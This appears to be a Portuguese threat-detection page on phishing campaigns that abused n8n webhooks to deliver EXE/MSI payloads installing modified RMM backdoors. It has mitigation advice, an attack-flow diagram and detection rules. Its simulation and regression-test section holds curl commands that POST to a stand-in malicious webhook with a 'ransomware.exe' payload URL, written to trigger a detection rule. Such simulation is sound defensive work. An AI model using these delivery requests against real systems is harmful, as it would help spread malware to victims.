Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Agentes de ameaça estão explorando a plataforma de automação de baixo código n8n para distribuir cargas maliciosas e perfilar destinatários de e-mail. Ao incorporar URLs de webhook prejudiciais em mensagens de phishing, eles conseguem entregar arquivos executáveis ou instaladores MSI que implantam ferramentas de acesso remoto nos sistemas das vítimas. A atividade também inclui o uso de pixels de rastreamento invisíveis que coletam informações da vítima assim que o e-mail é aberto. Esta campanha destaca como um serviço legítimo de automação de fluxo de trabalho pode ser reaproveitado para entrega de malware sem exigir credenciais roubadas.
Investigação
A Cisco Talos analisou uma série de campanhas de phishing observadas entre outubro de 2025 e março de 2026 que utilizaram URLs de webhook do n8n incorporadas em mensagens de e-mail. As iscas usavam links falsos do OneDrive que primeiro exibiam um prompt CAPTCHA antes de servir um .exe ou arquivo MSI malicioso. Após a execução, as cargas instalavam versões modificadas das ferramentas Datto ou ITarian RMM e criavam tarefas agendadas para manter a persistência. A Talos também encontrou atividade de impressão digital através de tags de imagem que chamavam URLs de webhook do n8n contendo identificadores específicos da vítima.
Mitigação
As organizações devem monitorar o tráfego de saída incomum para domínios relacionados ao n8n a partir de sistemas que normalmente não usariam serviços de automação e inspecionar padrões suspeitos de URL de webhook. URLs que resolvem para subdomínios desconhecidos de n8n.cloud devem ser bloqueadas ou detonadas em um sandbox antes de permitir o acesso do usuário. Os controles de segurança de e-mail também devem ser ajustados para detectar conteúdo HTML malicioso, fluxos de CAPTCHA falsos e pixels de rastreamento ocultos. IOCs relevantes, incluindo URLs de webhook e hashes de arquivos maliciosos, devem ser compartilhados com plataformas de inteligência de ameaças e defensores internos.
Resposta
As equipes de segurança devem alertar sobre a presença de URLs de webhook do n8n em conteúdo de e-mail ou telemetria de rede e isolar quaisquer hosts afetados assim que a atividade suspeita for confirmada. Quaisquer ferramentas RMM instaladas e tarefas agendadas relacionadas devem ser removidas, seguidas por uma análise forense para descobrir persistência adicional ou cargas subsequentes. Políticas de firewall e proxy devem ser atualizadas para restringir o acesso a endpoints não autorizados do n8n. As organizações também devem completar um processo completo de compartilhamento de IOCs entre equipes internas e parceiros externos de confiança.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes action_phishing["<b>Ação</b> – <b>T1566 Phishing</b>: Agentes de ameaça enviam e-mails maliciosos contendo URLs de webhook do n8n para atrair vítimas.<br/><b>Descrição</b>: Tentativas de phishing para entregar conteúdo malicioso via e-mail."] class action_phishing action tool_webhook["<b>Ferramenta</b> – <b>Nome</b>: webhook do n8n<br/><b>Descrição</b>: Endpoint web customizado usado para entregar cargas.”>] class tool_webhook tool action_user_execution["<b>Ação</b> – <b>T1204.001 Execução pelo Usuário: Link Malicioso</b>: A vítima clica no link do webhook, fazendo com que o navegador solicite o URL.<br/><b>Descrição</b>: O usuário interage com conteúdo malicioso."] class action_user_execution action action_exfil_webhook1["<b>Ação</b> – <b>T1567.004 Exfiltração via Webhook</b>: O webhook retorna uma página HTML maliciosa com um CAPTCHA e transmite uma carga (EXE ou MSI) enquanto serve pixels de rastreamento.<br/><b>Descrição</b>: Usa um serviço web para entregar e exfiltrar dados."] class action_exfil_webhook1 action malware_payload_exe["<b>Malware</b> – <b>Nome</b>: Payload EXE/MSI<br/><b>Descrição</b>: Executável que executa PowerShell para instalar uma ferramenta RMM modificada."] class malware_payload_exe malware action_powershell["<b>Ação</b> – <b>T1059.001 PowerShell</b>: O executável baixado executa comandos PowerShell para configurar e instalar a ferramenta RMM modificada.<br/><b>Descrição</b>: Interpretador de comando e script."] class action_powershell action malware_rmm["<b>Malware</b> – <b>Nome</b>: backdoor RMM modificado<br/><b>Descrição</b>: Ferramenta de monitoramento e gerenciamento remoto usada para persistência."] class malware_rmm malware action_service_execution["<b>Ação</b> – <b>T1569.002 Execução de Serviço</b>: A ferramenta RMM é instalada como um serviço do Windows para persistência.<br/><b>Descrição</b>: Executa via serviço do sistema."] class action_service_execution action action_scheduled_task["<b>Ação</b> – <b>T1053 Tarefa Tarefa/Agendamento</b>: Uma tarefa agendada é criada para garantir que a ferramenta RMM seja executada de forma persistente.<br/><b>Descrição</b>: Garante execução recorrente."] class action_scheduled_task action action_msi_execution["<b>Ação</b> – <b>T1218.007 Msiexec</b>: MSI malicioso é executado via msiexec para implantar o backdoor RMM.<br/><b>Descrição</b>: Execução de proxy binário do sistema."] class action_msi_execution action action_exfil_webhook2["<b>Ação</b> – <b>T1567.004 Exfiltração via Webhook</b>: Pixel de rastreamento invisível carrega o webhook para capturar eventos de abertura de e-mail e informações do dispositivo para reconhecimento."] class action_exfil_webhook2 action %% Connections action_phishing –>|entrega| tool_webhook tool_webhook –>|aciona| action_user_execution action_user_execution –>|leva para| action_exfil_webhook1 action_exfil_webhook1 –>|entrega| malware_payload_exe malware_payload_exe –>|executa| action_powershell action_powershell –>|instala| malware_rmm malware_rmm –>|persiste via| action_service_execution action_service_execution –>|cria| action_scheduled_task action_scheduled_task –>|suporta| action_msi_execution action_msi_execution –>|implanta| malware_rmm malware_rmm –>|comunica-se via| action_exfil_webhook2 "
Fluxo de Ataque
Detecções
Possível Dupla Extensão de Arquivo Malicioso (via criação de processo)
Visualizar
Tentativa de Execução do Gerenciador de Endpoint ITarian no Windows (via criação de processo)
Visualizar
Software Alternativo de Acesso/ Gerenciamento Remoto (via criação de processo)
Visualizar
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)
Visualizar
Possível Infiltração/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via dns)
Visualizar
IOCs (HashSha256) para detectar: O n8n n8mare: Como os atores de ameaça estão explorando a automação de fluxo de trabalho com IA
Visualizar
Detectar Requests HTTP GET para URLs de Webhook do n8n [Proxy]
Visualizar
Detecção de Abuso de Webhook do n8n para Entrega de Malware e Impressão Digital de Dispositivos [Servidor Web]
Visualizar
Execução de Simulação
Pré-requisito: O Teste Preliminar de Telemetria & Linha de Base deve ter sido bem-sucedido.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para desencadear a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque & Comandos:
Um atacante compra um domínio de curta duração que aponta para
n8n.cloud/webhook. Eles criam um fluxo de trabalho n8n malicioso que, uma vez acionado, serve a carga de ransomware. O e-mail de phishing contém um link para uma página de destino com um desafio CAPTCHA. A vítima resolve o CAPTCHA, que o JavaScript do atacante encaminha como o valorCAPTCHA=solved123no corpo HTTP de uma solicitação POST para o webhook. O webhook responde com um downloader PowerShell que executa a carga. Este fluxo gera uma solicitação HTTP cujo URL contémn8n.cloud/webhookand cujo corpo contém a stringCAPTCHA, correspondendo perfeitamente à regra Sigma.# Passo 1 – Vítima completa o CAPTCHA (simulado) CAPTCHA_TOKEN="solved123" # Passo 2 – Crie o POST malicioso que imita a ação da vítima curl -X POST "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=https://malicious.example.com/ransomware.exe" -
Script de Teste de Regressão:
#!/usr/bin/env bash set -euo pipefail # Variáveis – ajuste para seu ambiente de teste WEBHOOK_HOST="my.malicious-n8n.cloud" WEBHOOK_PATH="/webhook/malicious-workflow" CAPTCHA_TOKEN="solved123" PAYLOAD_URL="https://malicious.example.com/ransomware.exe" echo "[*] Simulando abuso de webhook n8n impulsionado por CAPTCHA..." curl -s -o /dev/null -w "%{http_code}n" -X POST "https://${WEBHOOK_HOST}${WEBHOOK_PATH}" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=${PAYLOAD_URL}" echo "[+] Simulação completa. Verifique a detecção no SIEM." -
Comandos de Limpeza:
# Se um webhook real foi criado para teste, exclua-o via interface do n8n ou API. # Exemplo de chamada API (substitua API_KEY e WORKFLOW_ID): curl -X DELETE "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Authorization: Bearer API_KEY" # Remova quaisquer arquivos temporários (nenhum criado neste script) echo "[+] Limpeza concluída."